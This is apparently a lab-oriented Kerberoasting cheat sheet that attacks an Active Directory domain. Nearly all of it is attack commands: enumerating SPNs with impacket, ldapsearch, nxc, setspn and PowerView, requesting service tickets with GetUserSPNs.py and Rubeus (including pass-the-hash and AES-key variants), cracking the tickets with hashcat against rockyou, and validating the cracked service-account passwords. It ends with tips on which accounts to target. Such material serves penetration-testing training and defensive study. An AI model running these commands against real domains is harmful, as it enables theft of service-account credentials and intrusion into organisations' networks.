Kerberoasting targets accounts with SPNs. We authenticate as any domain user, request service tickets for SPNs, save the returned TGS material, and crack the service account password offline.
Linux list SPNs
GetUserSPNs.py ootw.local/student:'student' -dc-ip 10.10.10.200
ldapsearch -x -H ldap://10.10.10.200 -D "ootw\\student" -w 'student' -b "DC=ootw,DC=local" "(servicePrincipalName=*)" servicePrincipalName sAMAccountName
nxc ldap 10.10.10.200 -u student -p 'student' --kerberoast kerberoast.hashes
Linux request all roastable SPNs
GetUserSPNs.py ootw.local/student:'student' -dc-ip 10.10.10.200 -request -outputfile kerberoast.hashes
Linux request one target
GetUserSPNs.py ootw.local/student:'student' -dc-ip 10.10.10.200 -request-user svc_sql -outputfile svc_sql.hash
Linux with alternate authentication
GetUserSPNs.py ootw.local/student -dc-ip 10.10.10.200 -hashes :<NTLM_HASH> -request -outputfile kerberoast.hashes
KRB5CCNAME=/tmp/student.ccache GetUserSPNs.py ootw.local/student -k -dc-ip 10.10.10.200 -request -outputfile kerberoast.hashes
GetUserSPNs.py ootw.local/student -aesKey <HEX_AESKEY> -dc-ip 10.10.10.200 -request -outputfile kerberoast.hashes
Windows enumerate SPNs
setspn.exe -Q */*
Get-DomainUser -SPN | Select-Object samaccountname,serviceprincipalname
Get-NetUser -SPN | ?{ $_.SPN -match 'mssql|cifs|http|ldap' }
Windows roast
Rubeus.exe kerberoast /nowrap /outfile:kerberoast.hashes
Rubeus.exe kerberoast /spn:MSSQLSvc/sql01.ootw.local:1433 /simple /nowrap
Rubeus.exe kerberoast /user:svc_sql /nowrap
LDAP target filter
(&(samAccountType=805306368)(servicePrincipalName=*)(!samAccountName=krbtgt)(!(UserAccountControl:1.2.840.113556.1.4.803:=2)))
Crack RC4
hashcat -m 13100 kerberoast.hashes /usr/share/wordlists/rockyou.txt -r rules/best64.rule -O -w 3
hashcat -m 13100 kerberoast.hashes /usr/share/wordlists/rockyou.txt --show
Crack AES
hashcat -m 19600 kerberoast.hashes /usr/share/wordlists/rockyou.txt
hashcat -m 19700 kerberoast.hashes /usr/share/wordlists/rockyou.txt
Validate
nxc smb 10.10.10.200 -u svc_sql -p '<CRACKED_PASSWORD>' -d ootw.local
nxc ldap 10.10.10.200 -u svc_sql -p '<CRACKED_PASSWORD>' -d ootw.local
Notes
Prioritize user-owned service accounts over computer accounts. Computer account passwords are long, random, and rotated by default. Human-managed service accounts are more likely to crack.
RC4 Kerberoast material starts with $krb5tgs$23$. AES material starts with $krb5tgs$17$ or $krb5tgs$18$. Choose the hashcat mode based on that marker.